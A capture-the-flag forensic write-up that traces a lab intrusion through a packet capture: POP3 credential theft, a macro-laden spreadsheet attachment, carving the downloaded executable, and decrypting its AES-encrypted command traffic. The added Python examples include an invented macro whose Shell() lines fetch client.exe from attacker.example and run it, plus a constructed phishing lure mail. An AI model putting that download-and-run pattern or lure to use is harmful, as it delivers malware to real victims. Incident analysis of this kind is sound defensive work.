Pressed
A full-scale intrusion was recently detected within the network, raising critical alarms. - by hadrian3689
The following post by 0xb0b is licensed under CC BY 4.0
A full-scale intrusion was recently detected within the network, raising critical alarms. Fortunately, a packet capture (PCAP) was recorded during the incident, capturing the attacker's initial entry and subsequent actions.
Our task is to analyse the traffic, identify how the attacker gained access, and uncover the sequence of malicious activity.
We download the PCAP file from the box provided and use Wireshark to analyze it.
http://<IP>:8000/traffic.pcapng
Analyzing POP3 Traffic
Starting with packet no. 2448, we see POP3 packets in which someone tries unsuccessfully to log in with different email addresses.

Starting with packet 2886, we see more POP3 traffic; this time the attacker logs in successfully.

We see it was Hazel's account that got compromised. The client sends the username and the password base64-encoded, and base64 is an encoding rather than encryption, so both can be recovered straight from the capture:
aGF6ZWxAcHJlc3NlZC50aG0= (decodes to hazel@pressed.thm)
cGFzc3dvcmQ= (decodes to password)
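To show how the credentials above are recovered, here is a small parser for a POP3 AUTH LOGIN exchange, written as an added example for this writeup and not taken from the room or the capture. The dialogue it runs on is constructed: the failed attempt with john@pressed.thm is invented, and the real capture may frame the login as USER/PASS or AUTH PLAIN instead of AUTH LOGIN. The two base64 values of the successful attempt are the ones seen in the capture.

```python
import base64

# Constructed POP3 dialogue modelled on the capture: "S:" lines are server
# replies, "C:" lines are client commands. The first attempt is invented;
# the two base64 values of the second are the ones seen in the capture.
SAMPLE_DIALOGUE = """\
S: +OK POP3 server ready
C: AUTH LOGIN
S: + VXNlcm5hbWU6
C: am9obkBwcmVzc2VkLnRobQ==
S: + UGFzc3dvcmQ6
C: d3Jvbmc=
S: -ERR [AUTH] Authentication failed.
C: AUTH LOGIN
S: + VXNlcm5hbWU6
C: aGF6ZWxAcHJlc3NlZC50aG0=
S: + UGFzc3dvcmQ6
C: cGFzc3dvcmQ=
S: +OK Logged in.
"""


def decode_credential(token):
    """AUTH LOGIN sends username and password as bare base64; this is an
    encoding, not encryption, so anyone holding the capture can reverse it."""
    return base64.b64decode(token).decode("utf-8")


def parse_pop3_logins(dialogue):
    """Return every AUTH LOGIN attempt as (username, password, succeeded)."""
    attempts, state, user, password = [], None, None, None
    for raw in dialogue.splitlines():
        side, _, line = raw.partition(": ")
        if side == "C" and line.upper() == "AUTH LOGIN":
            state, user, password = "user", None, None   # a new attempt starts
        elif side == "C" and state == "user":
            user, state = decode_credential(line), "pass"
        elif side == "C" and state == "pass":
            password, state = decode_credential(line), "result"
        elif side == "S" and state == "result":
            attempts.append((user, password, line.startswith("+OK")))
            state = None
    return attempts


def compromised_accounts(dialogue):
    """Only the attempts the server accepted matter when scoping the incident."""
    return [(u, p) for u, p, ok in parse_pop3_logins(dialogue) if ok]


if __name__ == "__main__":
    for user, password, ok in parse_pop3_logins(SAMPLE_DIALOGUE):
        print(f"{'OK  ' if ok else 'FAIL'} {user}:{password}")
```

The failed attempts are kept in the result on purpose: the list of usernames the attacker guessed before hitting Hazel's account is useful scoping information, not noise.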

Analysis Of The Attachment
We follow the TCP stream at packet 2886 and see that hazel was pressured into opening the sheets.ods file.

We copy the base64-encoded attachment, which is the sheets.ods file, and decode it:
base64 -d attachment.b64 > sheets.ods
An ODS document is a zip archive, so the decoded file should start with the PK magic bytes; if it does not, the copied base64 block is incomplete.

We open that file and inspect the macros, where we spot the download and execution of a file called client.exe. Furthermore, the macro echoes a string.

This is the first part of the flag.
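The same two steps, pulling the attachment out of the mail and inspecting the macro, as an added Python example that is not part of the original writeup. It builds a stand-in sheets.ods (a zip with a Basic/Standard/Module1.xml module, which is where LibreOffice stores Basic macros) and a constructed lure mail around it; the sender address, the download URL and the macro body are invented placeholders, not the real macro from the capture.

```python
import email
import email.policy
import io
import re
import zipfile
from email.message import EmailMessage

# Invented macro standing in for the one in sheets.ods: LibreOffice keeps Basic
# macros as XML under Basic/<Library>/<Module>.xml inside the ODS zip. The URL
# and the echoed string are placeholders, not the real values from the capture.
FAKE_MACRO = """<?xml version="1.0" encoding="UTF-8"?>
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">
Sub Main
    Shell("cmd /c curl http://attacker.example/client.exe -o C:\\Users\\Public\\client.exe")
    Shell("C:\\Users\\Public\\client.exe")
    Shell("cmd /c echo constructed-sample-string")
End Sub
</script:module>
"""


def build_fake_ods():
    """Minimal ODS: 'mimetype' first and uncompressed, as ODF requires."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.spreadsheet",
                   compress_type=zipfile.ZIP_STORED)
        z.writestr("content.xml", "<office:document-content/>",
                   compress_type=zipfile.ZIP_DEFLATED)
        z.writestr("Basic/Standard/Module1.xml", FAKE_MACRO,
                   compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


def build_phishing_mail(ods_bytes):
    """Constructed lure mail carrying the ODS as a base64 attachment."""
    msg = EmailMessage()
    msg["From"] = "boss@pressed.thm"          # invented sender
    msg["To"] = "hazel@pressed.thm"
    msg["Subject"] = "URGENT: open the attached sheet now"
    msg.set_content("Hazel, I need the numbers in the attached sheet before the meeting.")
    msg.add_attachment(ods_bytes, maintype="application",
                       subtype="vnd.oasis.opendocument.spreadsheet",
                       filename="sheets.ods")
    return msg.as_bytes()


def extract_attachments(raw_mail):
    """Map attachment filename -> decoded bytes (get_payload undoes the base64)."""
    msg = email.message_from_bytes(raw_mail, policy=email.policy.default)
    return {part.get_filename(): part.get_payload(decode=True)
            for part in msg.iter_attachments()}


URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")
ECHO_RE = re.compile(r"""\becho\s+([^"&|)]+)""")


def inspect_ods_macros(ods_bytes):
    """Confirm the decode produced a zip, then pull URLs, Shell() calls and
    echoed strings out of every Basic module in the archive."""
    if ods_bytes[:4] != b"PK\x03\x04":
        raise ValueError("not a zip container, so not an ODF document")
    report = {}
    with zipfile.ZipFile(io.BytesIO(ods_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("Basic/") and name.endswith(".xml")):
                continue
            text = z.read(name).decode("utf-8", "replace")
            report[name] = {
                "urls": URL_RE.findall(text),
                "shell_calls": [l.strip() for l in text.splitlines() if "Shell(" in l],
                "echoed": [e.strip() for e in ECHO_RE.findall(text)],
            }
    return report


if __name__ == "__main__":
    mail = build_phishing_mail(build_fake_ods())
    for name, data in extract_attachments(mail).items():
        print(name, len(data), "bytes")
        for module, findings in inspect_ods_macros(data).items():
            print(" ", module, findings)
```

The URL list will also contain the script namespace URL from the module header, which is a reminder that a regex over macro XML needs a human pass afterwards; the Shell() lines and the echoed string are the parts worth reading first.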

Tracing The File Download
Now we know a file is downloaded and executed, so we look for that download to find the next part of the flag. We see the download happens at packet no. 2962.

We follow the TCP stream...

...and switch from ASCII to Raw!

Next, we save the RAW stream to a file.

Decompilation Of The Malicious File
We remove the first lines, i.e. the HTTP response headers, up to the MZ magic bytes so the file begins with the DOS header. When saving the stream, make sure only the server-to-client direction is selected in the Follow TCP Stream dialog; otherwise the client's request ends up in the file too.
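Carving the executable out of the saved raw stream, as an added example that is not from the original writeup. Instead of deleting lines by hand it cuts at the end of the HTTP response headers, checks the Content-Length against what was saved, verifies the MZ and PE signatures and records the SHA-256 for an IOC list. The HTTP response and the minimal PE it carves are constructed inside the script (they are not client.exe), and the fallback search for "MZ" mirrors the manual approach above.

```python
import hashlib
import re
import struct

# Machine field of the COFF header -> architecture (only the two common ones).
ARCH = {0x14C: "x86", 0x8664: "x64"}


def build_fake_pe():
    """Constructed stand-in for client.exe: a DOS stub whose e_lfanew points at
    a PE signature and a COFF header (AMD64, 2 sections). Not the real sample."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)             # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0x5F000000, 0, 0, 0xF0, 0x22)
    return bytes(dos) + b"PE\0\0" + coff + b"\0" * 64


# Constructed raw server-to-client stream, as Wireshark's "Save as" with Raw
# selected would write it: HTTP response headers, blank line, then the body.
SAMPLE_STREAM = (b"HTTP/1.0 200 OK\r\n"
                 b"Server: constructed-sample\r\n"
                 b"Content-Type: application/octet-stream\r\n"
                 b"Content-Length: " + str(len(build_fake_pe())).encode() + b"\r\n"
                 b"\r\n" + build_fake_pe())


def carve_pe(stream):
    """Cut the executable out of a saved raw stream and sanity-check it."""
    if stream.startswith(b"HTTP/") and b"\r\n\r\n" in stream:
        headers, body = stream.split(b"\r\n\r\n", 1)
        m = re.search(rb"(?im)^content-length:\s*(\d+)", headers)
        if m and int(m.group(1)) != len(body):
            raise ValueError(f"body is {len(body)} bytes but Content-Length is "
                             f"{int(m.group(1))}: truncated or multi-response stream")
    else:
        # No HTTP framing visible: fall back to the manual approach and
        # start the file at the first 'MZ'.
        start = stream.find(b"MZ")
        if start == -1:
            raise ValueError("no MZ header in stream")
        body = stream[start:]
    if body[:2] != b"MZ" or len(body) < 0x40:
        raise ValueError("carved data does not start with a DOS header")
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    if body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew; wrong offset or damaged file")
    machine, sections, timestamp = struct.unpack_from("<HHI", body, e_lfanew + 4)
    return {
        "data": body,
        "size": len(body),
        "sha256": hashlib.sha256(body).hexdigest(),   # for the IOC list
        "arch": ARCH.get(machine, hex(machine)),
        "sections": sections,
        "timestamp": timestamp,                        # link time, seconds since epoch
    }


if __name__ == "__main__":
    info = carve_pe(SAMPLE_STREAM)
    with open("client.exe", "wb") as f:
        f.write(info["data"])
    print({k: v for k, v in info.items() if k != "data"})
```

The Content-Length check is the part that catches the usual mistake: a stream saved with both directions, or with a second response appended, silently produces a file that Ghidra may still open but whose hash matches nothing.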


Using Ghidra, we analyze the executable and inspect the main function.

Here we see a connection being set up to port 443, which we will find later in the PCAP. The port alone says nothing about TLS: as the decryption further down shows, the implant puts raw AES ciphertext in the TCP payload rather than speaking TLS, which is why the bytes can be copied straight out of Wireshark.


Furthermore, there is command execution going on whose traffic is encrypted with AES:

At the top of the main function we spot the use of a key variable.

By double-clicking on rhI1YazJLaLVgWv4 we find the values used for the encryption:
iv: pEw8P3PU9kCcG4sj
key1: rhI1YazJLaLVgWv4
key2: VKf7EQIvl8ps6MJj
All three values are 16 bytes long, which matches AES-128 (16-byte key, 16-byte block and therefore a 16-byte IV).
Decryption Of The C2 Traffic
Back to our traffic on port 443:

We inspect packets 6728 and 6729 and copy the value of the TCP payload...
fcc44520bbf8344c3c6fff2be387fe59

... and use CyberChef to decrypt the payload. We are able to identify the first command issued: whoami

And also its corresponding output:
6a45b8f4ecf91e260471f1dd47d82c5925d9e0356b16f4f9f056dcbc6f77aa6d

In packet no. 6731 we see the creation of another user.
1220b16630b84067c78ffb13915e8735bdb43608954e45203bccc5d8f72c7e4707dced8ae4cb01cfd078bc0051b56a196d85a59bff6d4974325c73b5692827ab

Which happens to be the second part of the flag.

We move on with each command issued:
Packet no. 6735:
ba8ffa0eb7d52a61bed3a892d9411076f4842dc910c643aeaac8204a05f170b9f789c6b7e0aef2de42993ac95ce07659182ce016e3befd6660fdec45804f7364

Packet no. 6741:
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

Packet no. 6743 - reading clients.csv:
9b8f6df3bd93c3ab10af70c980e231bfac35c591cd0bd0aba8c9104cd30dfbe56b2542aa70e39191db65a5cd2951bcf4

Packet no. 6744, the output of clients.csv, contains the final part of the flag:
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

For the final flag we put everything together and base64 decode it.